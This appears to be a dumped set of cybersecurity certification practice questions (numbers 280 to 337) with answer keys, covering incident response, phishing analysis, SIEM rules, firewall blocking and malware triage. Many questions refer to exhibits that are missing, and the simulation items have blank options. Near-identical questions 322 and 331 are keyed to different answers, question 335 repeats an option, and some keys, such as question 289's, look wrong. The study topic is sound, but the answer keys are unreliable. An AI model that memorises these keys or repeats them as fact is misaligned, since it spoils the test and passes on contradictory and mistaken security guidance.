An organization recently discovered some inconsistencies in the motherboards it received from a vendor. The organization's security team then provided
guidance on how to ensure the authenticity of the motherboards it received from vendors. Which of the following would be the BEST recommendation
for the security analyst to provide?

A. The organization should use a certified, trusted vendor as part of the supply chain.
B. The organization should evaluate current NDAs to ensure enforceability of legal actions.
C. The organization should maintain the relationship with the vendor and enforce vulnerability scans.
D. The organization should ensure all motherboards are equipped with a TPM.

Correct Answer: A

QUESTION 281
An online gaming company was impacted by a ransomware attack. An employee opened an attachment that was received via an SMS attack on a
company-issued mobile device while connected to the network. Which of the following actions would help during the forensic analysis of the mobile
device? (Choose two.)

A. Resetting the phone to factory settings
B. Rebooting the phone and installing the latest security updates
C. Documenting the respective chain of custody
D. Uninstalling any potentially unwanted programs
E. Performing a memory dump of the mobile device for analysis
F. Unlocking the device by blowing the eFuse

Correct Answer: CE

QUESTION 282
The help desk provided a security analyst with a screenshot of a user's desktop:

For which of the following is aircrack-ng being used?

A. Wireless access point discovery
B. Rainbow attack
C. Brute-force attack
D. PCAP data collection

Correct Answer: C

QUESTION 283
An organizational policy requires one person to input accounts payable and another to do accounts receivable. A separate control requires one person to
write a check and another person to sign all checks greater than $5,000 and to get an additional signature for checks greater than $10,000. Which of the
following controls has the organization implemented?

A. Segregation of duties
B. Job rotation
C. Non-repudiation
D. Dual control

Correct Answer: A

QUESTION 284
An incident response team is responding to a breach of multiple systems that contain PII and PHI. Disclosure of the incident to external entities should
be based on:

A. the responder's discretion.
B. the public relations policy.
C. the communication plan.
D. the senior management team's guidance.

Correct Answer: C

QUESTION 285
A new on-premises application server was recently installed on the network. Remote access to the server was enabled for vendor support on required
ports, but recent security reports show large amounts of data are being sent to various unauthorized networks through those ports. Which of the
following configuration changes must be implemented to resolve this security issue while still allowing remote vendor access?

A. Apply a firewall application server rule.
B. Add the application server to the allow list.
C. Sandbox the application server.
D. Enable port security.
E. Block the unauthorized networks.

Correct Answer: E

QUESTION 286
A company employee downloads an application from the internet. After the installation, the employee begins experiencing noticeable performance
issues, and files are appearing on the desktop:

Which of the following processes will the security analyst identify as the MOST likely indicator of system compromise given the processes running in
Task Manager?

A. Chrome.exe
B. Word.exe
C. Explorer.exe
D. mstsc.exe
E. taskmgr.exe

Correct Answer: D

QUESTION 287
An organization is adopting IoT devices at an increasing rate and will need to account for firmware updates in its vulnerability management programs.
Despite the number of devices being deployed, the organization has only focused on software patches so far, leaving hardware-related weaknesses
open to compromise. Which of the following best practices will help the organization to track and deploy trusted firmware updates as part of its
vulnerability management programs?

A. Utilize threat intelligence to guide risk evaluation activities and implement critical updates after proper testing.
B. Apply all firmware updates as soon as they are released to mitigate the risk of compromise.
C. Determine an annual patch cadence to ensure all patching occurs at the same time.
D. Implement an automated solution that detects when vendors release firmware updates and immediately deploy updates to production.

Correct Answer: A

QUESTION 288
Which of the following is a reason to use a risk-based cybersecurity framework?

A. A risk-based approach always requires quantifying each cyber risk faced by an organization.
B. A risk-based approach better allocates an organization's resources against cyberthreats and vulnerabilities.
C. A risk-based approach is driven by regulatory compliance and is required for most organizations.
D. A risk-based approach prioritizes vulnerability remediation by threat hunting and other qualitative-based processes.

Correct Answer: B

QUESTION 289
A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command
execution through an integer overflow:

Which of the following controls must be in place to prevent this vulnerability?

A. Convert all integer numbers in strings to handle the memory buffer correctly.
B. Implement float numbers instead of integers to prevent integer overflows.
C. Use built-in functions from libraries to check and handle long numbers properly.
D. Sanitize user inputs, avoiding small numbers that cannot be handled in the memory.

Correct Answer: D

QUESTION 290
An analyst is participating in the solution analysis process for a cloud-hosted SIEM platform to centralize log monitoring and alerting capabilities in the
SOC. Which of the following is the BEST approach for supply chain assessment when selecting a vendor?

A. Gather information from providers, including data center specifications and copies of audit reports
B. Identify SLA requirements for monitoring and logging
C. Consult with the senior management team for recommendations
D. Perform a proof of concept to identify possible solutions

Correct Answer: A

QUESTION 291
An analyst is investigating an anomalous event reported by the SOC. After reviewing the system logs, the analyst identifies an unexpected addition of a
user with root-level privileges on the endpoint. Which of the following data sources will BEST help the analyst to determine whether this event constitutes
an incident?

A. Patching logs
B. Threat feed
C. Backup logs
D. Change requests
E. Data classification matrix

Correct Answer: D

QUESTION 292
A security analyst is reviewing WAF logs and notes requests against the corporate website are increasing and starting to impact the performance of the
web server. The security analyst queries the logs for requests that triggered an alert on the WAF but were not blocked. Which of the following possible
TTP combinations might warrant further investigation? (Choose two.)

A. Requests identified by a threat intelligence service with a bad reputation
B. Requests sent from the same IP address using different user agents
C. Requests blocked by the web server per the input sanitization
D. Failed log-in attempts against the web application
E. Requests sent by NICs with outdated firmware
F. Existence of HTTP/501 status codes generated to the same IP address

Correct Answer: BF

QUESTION 293
Which of the following roles is ultimately responsible for determining the classification levels assigned to specific data sets?

A. Data custodian
B. Data owner
C. Data processor
D. Senior management

Correct Answer: B

QUESTION 294
An analyst is reviewing the output from some recent network enumeration activities. The following entry relates to a target on the network:

Based on the Nmap output above, which of the following features is running on the router?

A. Web application firewall
B. Port triggering
C. Intrusion prevention system
D. Port isolation
E. Port address translation

Correct Answer: A

QUESTION 295
The inability to do remote updates of certificates, keys, software, and firmware is a security issue commonly associated with:

A. web servers on private networks.
B. HVAC control systems.
C. smartphones.
D. firewalls and UTM devices.

Correct Answer: B

QUESTION 296
A cybersecurity analyst is working with a SIEM tool and reviewing the following table:

When creating a rule in the company's SIEM, which of the following would be the BEST approach for the analyst to use to assess the risk level of each
vulnerability that is discovered by the vulnerability assessment tool?

A. Create a trend with the table and join the trend with the desired rule to be able to extract the risk level of each vulnerability
B. Use Boolean filters in the SIEM rule to take advantage of real-time processing and RAM to store the table dynamically, generate the results faster,
and be able to display the table in a dashboard or export it as a report
C. Use a static table stored on the disk of the SIEM system to correlate its data with the data ingested by the vulnerability scanner data collector
D. Use the table as a new index or database for the SIEM to be able to use multisearch and then summarize the results as output

Correct Answer: B

QUESTION 297
A security analyst has discovered that developers have installed browsers on all development servers in the company's cloud infrastructure and are
using them to browse the internet. Which of the following changes should the security analyst make to BEST protect the environment?

A. Create a security rule that blocks internet access in the development VPC
B. Place a jumpbox in between the developers' workstations and the development VPC
C. Remove the administrator's profile from the developer user group in identity and access management
D. Create an alert that is triggered when a developer installs an application on a server

Correct Answer: A

QUESTION 298
A customer notifies a security analyst that a web application is vulnerable to information disclosure. The analyst needs to indicate the severity of the
vulnerability based on its CVSS score, which the analyst needs to calculate. When analyzing the vulnerability, the analyst realizes that for the attack to
be successful, the Tomcat configuration file must be modified. Which of the following values should the security analyst choose when evaluating the
CVSS score?

A. Network
B. Physical
C. Adjacent
D. Local

Correct Answer: D

QUESTION 299
A security analyst was transferred to an organization's threat-hunting team to track specific activity throughout the enterprise environment. The analyst
must observe and assess the number of times this activity occurs and aggregate the results. Which of the following is the BEST threat-hunting method
for the analyst to use?

A. Stack counting
B. Searching
C. Clustering
D. Grouping

Correct Answer: A

QUESTION 300
A security analyst is building a malware analysis lab. The analyst wants to ensure malicious applications are not capable of escaping the virtual
machines and pivoting to other networks. To BEST mitigate this risk, the analyst should use:


A. an 802.11ac wireless bridge to create an air gap.
B. a managed switch to segment the lab into a separate VLAN.
C. a firewall to isolate the lab network from all other networks.
D. an unmanaged switch to segment the environments from one another.

Correct Answer: C

QUESTION 301
A security analyst is attempting to resolve an incident in which highly confidential company pricing information was sent to clients. It appears this
information was unintentionally sent by an employee who attached it to public marketing material. Which of the following configuration changes would
work BEST to limit the risk of this incident being repeated?

A. Add client addresses to the blocklist
B. Update the DLP rules and metadata
C. Sanitize the marketing material
D. Update the insider threat procedures

Correct Answer: B

QUESTION 302
Which of the following techniques can be implemented to safeguard the confidentiality of sensitive information while allowing limited access to
authorized individuals?

A. Deidentification
B. Hashing
C. Masking
D. Salting

Correct Answer: C

QUESTION 303
During an incident response procedure, a security analyst acquired the needed evidence from the hard drive of a compromised machine. Which of the
following actions should the analyst perform NEXT to ensure the data integrity of the evidence?

A. Generate hashes for each file from the hard drive.
B. Create a chain of custody document.
C. Determine a timeline of events using correct time synchronization.
D. Keep the cloned hard drive in a safe place.


Correct Answer: B

QUESTION 304
A security analyst is investigating a reported phishing attempt that was received by many users throughout the company. The text of one of the emails is
shown below:

Office 365 User,

It looks like your account has been locked out. Please click this http://accountfix-office356 com/login.php and follow the prompts to restore access.
Regards,
Security Team

Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network
traffic, but it does log network flow data. Which of the following commands will the analyst most likely execute NEXT?

A. telnet off1ce365.com 25
B. tracert 122.167.40.119
C. curl http://accountfix-office356.com/login.php
D. nslookup accountfix-office356.com

Correct Answer: D

QUESTION 305
A security analyst discovers a vulnerability on an unpatched web server that is used for testing machine learning on Big Data sets. Exploitation of the
vulnerability could cost the organization $1.5 million in lost productivity. The server is located on an isolated network segment that has a 5% chance of
being compromised. Which of the following is the value of this risk?


A. $75,000
B. $300,000
C. $1,425 million
D. $1.5 million

Correct Answer: A

QUESTION 306
A security analyst is researching ways to improve the security of a company's email system to mitigate emails that are impersonating company
executives. Which of the following would be BEST for the analyst to configure to achieve this objective?

A. An AAAA record on the name server for SPF
B. DNSSEC keys to secure replication
C. Domain Keys Identified Mail
D. A sandbox to check incoming mail

Correct Answer: C

QUESTION 307
A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile phones. The Chief Information Security Officer is
concerned with ensuring all devices are patched and running some sort of protection against malicious software. Which of the following existing
technical controls should a security analyst recommend to BEST meet all the requirements?

A. EDR
B. Port security
C. NAC
D. Segmentation

Correct Answer: A

QUESTION 308
An employee in the billing department accidentally sent a spreadsheet containing payment card data to a recipient outside the organization. The
employee intended to send the spreadsheet to an internal staff member with a similar name and was unaware of the mistake until the recipient replied to
the message. In addition to retraining the employee, which of the following would prevent this from happening in the future?

A. Implement outgoing filter rules to quarantine messages that contain card data.
B. Configure the outgoing mail filter to allow attachments only to addresses on the allow list.
C. Remove all external recipients from the employee's address book.
D. Set the outgoing mail filter to strip spreadsheet attachments from all messages.


Correct Answer: A

QUESTION 309
A security analyst working in the SOC recently discovered instances in which hosts visited a specific set of domains and IPs and became infected with
malware. Which of the following is the MOST appropriate action to take in this situation?

A. Implement an IPS signature for the malware and update the deny list for the associated domains and IPs
B. Implement an IPS signature for the malware and another signature request to block all the associated domains and IPs
C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains
D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the origin IPs' subnets and
second-level domains

Correct Answer: D

QUESTION 310
Which of the following solutions is the BEST method to prevent unauthorized use of an API?

A. HTTPS
B. Geofencing
C. Rate limiting
D. Authentication

Correct Answer: D

QUESTION 311
A security analyst at a technology solutions firm has uncovered the same vulnerabilities on a vulnerability scan for a long period of time. The
vulnerabilities are on systems that are dedicated to the firm's largest client. Which of the following is MOST likely inhibiting the remediation efforts?

A. The parties have an MOU between them that could prevent shutting down the systems
B. There is a potential disruption of the vendor-client relationship
C. Patches for the vulnerabilities have not been fully tested by the software vendor
D. There is an SLA with the client that allows very little downtime

Correct Answer: D

QUESTION 312
A security manager has asked an analyst to provide feedback on the results of a penetration test. After reviewing the results, the manager requests
information regarding the possible exploitation of vulnerabilities. Which of the following data points would be MOST useful for the analyst to
provide to the security manager, who would then communicate the risk factors to the senior management team? (Choose two.)


A. Probability
B. Adversary capability
C. Attack vector
D. Impact
E. Classification
F. Indicators of compromise

Correct Answer: AD

QUESTION 313
During the threat modeling process for a new application that a company is launching, a security analyst needs to define methods and items to take into
consideration. Which of the following are part of a known threat modeling method?

A. Threat profile, infrastructure and application vulnerabilities, security strategy and plans
B. Purpose, objective, scope, team management, cost, roles and responsibilities
C. Spoofing, tampering, repudiation, information disclosure, denial of service, elevation of privilege
D. Human impact, adversary's motivation, adversary's resources, adversary's methods

Correct Answer: C

QUESTION 314
A systems administrator believes a user's workstation has been compromised. The workstation's performance has been lagging significantly for the past
several hours. The administrator runs the tasklist /v command and receives the following output:


Which of the following should a security analyst recognize as an indicator of compromise?

A. dwm.exe being executed under the user context
B. The high memory usage of vscode.exe*32
C. The abnormal behavior of paint.exe
D. svchost.exe being executed as SYSTEM

Correct Answer: C

QUESTION 315
Which of the following BEST describes HSM?

A. A computing device that manages cryptography, decrypts traffic, and maintains library calls
B. A computing device that manages digital keys, performs encryption/decryption functions, and maintains other cryptographic functions
C. A computing device that manages physical keys, encrypts devices, and creates strong cryptographic functions
D. A computing device that manages algorithms, performs entropy functions, and maintains digital signatures

Correct Answer: B

QUESTION 316
An organization discovers motherboards within the environment that appear to have been physically altered during the manufacturing process. Which of
the following is the BEST course of action to mitigate the risk of this reoccurring?

A. Perform an assessment of the firmware to determine any malicious modifications.
B. Conduct a trade study to determine if the additional risk constitutes further action.
C. Coordinate a supply chain assessment to ensure hardware authenticity.
D. Work with IT to replace the devices with the known-altered motherboards.

Correct Answer: C

QUESTION 317
A security analyst is reviewing a suspected phishing campaign that has targeted an organization. The organization has enabled a few email security
technologies in the last year; however, the analyst believes the security features are not working. The analyst runs the following command:

> dig domain._domainkey.comptia.org TXT

Which of the following email protection technologies is the analyst MOST likely validating?

A. SPF


B. DNSSEC
C. DMARC
D. DKIM

Correct Answer: D

QUESTION 318
A cybersecurity analyst is reading a daily intelligence digest of new vulnerabilities. The type of vulnerability that should be disseminated FIRST is one
that:

A. enables remote code execution that is being exploited in the wild.
B. enables data leakage but is not known to be in the environment.
C. enables lateral movement and was reported as a proof of concept.
D. affected the organization in the past but was probably contained and eradicated.

Correct Answer: A

QUESTION 319
A developer wrote a script to make names and other PII data unidentifiable before loading a database export into the testing system. Which of the
following describes the type of control that is being used?

A. Data encoding
B. Data masking
C. Data loss prevention
D. Data classification

Correct Answer: B

QUESTION 320
A security analyst is investigating a compromised Linux server. The analyst issues the ps command and receives the following output:


Which of the following commands should the administrator run NEXT to further analyze the compromised system?

A. strace /proc/1301
B. rpm -V openssh-server
C. /bin/ls -1 /proc/1301/exe
D. kill -9 1301

Correct Answer: C

QUESTION 321
HOTSPOT

Malware is suspected on a server in the environment.

The analyst is provided with the output of commands from servers in the environment and needs to review all output files in order to determine which
process running on one of the servers may be malware.

INSTRUCTIONS

Servers 1, 2, and 4 are clickable. Select the server and the process that hosts the malware.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.


A. Answer: See explanation below. Server 4, Svchost.exe


B.
C.
D.

Correct Answer: A

QUESTION 322
A security analyst sees the following OWASP ZAP output from a scan that was performed against a modern version of Windows while testing for client-
side vulnerabilities:

Alert Detail
Low (Medium) Web Browser XSS Protection not enabled
Description: Web browser XSS protection not enabled, or disabled by the configuration of the HTTP Response header
URL: https://domain.com/sun/ray

Which of the following is the MOST likely solution to the listed vulnerability?

A. Enable the browser's XSS filter.
B. Enable Windows XSS protection.
C. Enable the browser's protected pages mode.
D. Enable server-side XSS protection.

Correct Answer: D

QUESTION 323
A new variant of malware is spreading on the company network using TCP/443 to contact its command-and-control server. The domain name used for
callback continues to change, and the analyst is unable to predict future domain name variance. Which of the following actions should the analyst take to
stop malicious communications with the LEAST disruption to service?

A. Implement a sinkhole with a high entropy level.
B. Disable TCP/53 at the perimeter firewall.
C. Block TCP/443 at the edge router.
D. Configure the DNS forwarders to use recursion.

Correct Answer: A

QUESTION 324
An email analysis system notifies a security analyst that the following message was quarantined and requires further review.

From: CEO@CompTIA.org


To: Purchasing@CompTIA.org
Subject: [EXTERNAL] Gift card purchase ASAP
Body:

Please purchase gift cards to any major electronics store and reply with pictures of them to this email!

Which of the following actions should the security analyst take?

A. Release the email for delivery due to its importance.
B. Immediately contact a purchasing agent to expedite.
C. Delete the email and block the sender.
D. Purchase the gift cards and submit an expense report.

Correct Answer: C

QUESTION 325
A security analyst is conducting a post-incident log analysis to determine which indicators can be used to detect further occurrences of a data exfiltration
incident. The analyst determines backups were not performed during this time and reviews the following:


Which of the following should the analyst review to find out how the data was exfiltrated?

A. Monday's logs
B. Tuesday's logs
C. Wednesday's logs


D. Thursday's logs

Correct Answer: D

QUESTION 326
HOTSPOT

The developers recently deployed new code to three web servers. A daily automated external device scan report shows server vulnerabilities that are
failing items according to PCI DSS. If the vulnerability is not valid, the analyst must take the proper steps to get the scan clean.

If the vulnerability is valid, the analyst must remediate the finding.

After reviewing the information provided in the network diagram, select the STEP 2 tab to complete the simulation by selecting the correct Validation
Result and Remediation Action for each server listed using the drop-down options.

INSTRUCTIONS

STEP 1: Review the information provided in the network diagram.

STEP 2: Given the scenario, determine which remediation action is required to address the vulnerability.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Step 1:


Step 2:


A.
B.
C.
D.

Correct Answer: A


QUESTION 327
An organization's Chief Information Security Officer has asked department leaders to coordinate on communication plans that can be enacted in
response to different cybersecurity incident triggers.

Which of the following is a benefit of having these communication plans?

A. They can help to prevent the inadvertent release of damaging information outside the organization
B. They can help to limit the spread of worms by coordinating with help desk personnel earlier in the recovery phase.
C. They can quickly inform the public relations team to begin coordinating with the media as soon as a breach is detected
D. They can help to keep the organization's senior leadership informed about the status of patching during the recovery phase

Correct Answer: A

QUESTION 328
A network attack that is exploiting a vulnerability in the SNMP is detected. Which of the following should the cybersecurity analyst do FIRST?

A. Apply the required patches to remediate the vulnerability
B. Escalate the incident to the senior management team for guidance
C. Disable all privileged user accounts on the network
D. Temporarily block the attacking IP address

Correct Answer: D

QUESTION 329
A general contractor has a list of contract documents containing critical business data that are stored at a public cloud provider. The organization's
security analyst recently reviewed some of the storage containers and discovered most of the containers are not encrypted. Which of the following
configurations will provide the MOST security to resolve the vulnerability?

A. Upgrading TLS 1.2 connections to TLS 1.3
B. Implementing AES-256 encryption on the containers
C. Enabling SHA-256 hashing on the containers
D. Implementing the Triple Data Encryption Algorithm at the file level

Correct Answer: B

QUESTION 330
An analyst is reviewing the following output as part of an incident:


Which of the following is MOST likely happening?

A. The hosts are part of a reflective denial-of-service attack
B. Information is leaking from the memory of host 10.20.30.40
C. Sensitive data is being exfiltrated by host 192.168.1.10
D. Host 192.168.1.10 is performing firewall port knocking

Correct Answer: C

QUESTION 331
A security analyst sees the following OWASP ZAP output from a scan that was performed against a modern version of Windows while testing for client-
side vulnerabilities:

Which of the following is the MOST likely solution to the listed vulnerability?

A. Enable the browser's XSS filter.
B. Enable Windows XSS protection.
C. Enable the private browsing mode.
D. Enable server-side XSS protection.

Correct Answer: A

QUESTION 332
A security analyst is investigating a reported phishing attempt that was received by many users throughout the company. The text of one of the emails is
shown below:

Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network
traffic, but it does log network flow data. Which of the following commands will the analyst most likely execute NEXT?

A. telnet off1ce365.com 25
B. tracert 122.167.40.119
C. curl http://accountfix-office356.com/login.php
D. nslookup accountfix-office356.com

Correct Answer: D

QUESTION 333
During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in
confirmed malware activity. The analyst also notes there is no other alert in place for this traffic. After resolving the security incident, which of the
following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?

A. Share details of the security incident with the organization's human resources management team.
B. Note the security incident to junior analysts so they are aware of the traffic.
C. Communicate the security incident to the threat team for further review and analysis.
D. Report the security incident for inclusion in the daily report.

Correct Answer: C

QUESTION 334
Given the Nmap request below:

Which of the following actions will an attacker be able to initiate directly against this host?

A. Password sniffing
B. ARP spoofing
C. A brute-force attack
D. An SQL injection

Correct Answer: C

QUESTION 335
A security analyst receives a report indicating a system was compromised due to malware that was downloaded from the internet using TFTP. The
analyst is instructed to block TFTP at the corporate firewall. Given the following portion of the current firewall rule set:

Which of the following rules should be added to accomplish this goal?

A. UDP ANY ANY ANY 20 Deny
B. UDP ANY ANY 69 69 Deny
C. UDP ANY ANY 67 68 Deny
D. UDP ANY ANY ANY 69 Deny
E. UDP ANY ANY ANY 69 Deny

Correct Answer: D

QUESTION 336
A security analyst found the following entry in a server log:

The analyst executed netstat and received the following output:

Which of the following lines in the output confirms this was successfully executed by the server?

A. 1
B. 2
C. 3
D. 4
E. 5
F. 6
G. 7

Correct Answer: E

QUESTION 337
Which of the following weaknesses associated with common SCADA systems are the MOST critical for organizations to address architecturally within
their networks? (Choose two.)

A. Boot processes that are neither measured nor attested
B. Legacy and unpatchable systems software
C. Unnecessary open ports and protocols
D. No OS kernel mandatory access controls
E. Unauthenticated commands
F. Insecure filesystem permissions

Correct Answer: BE
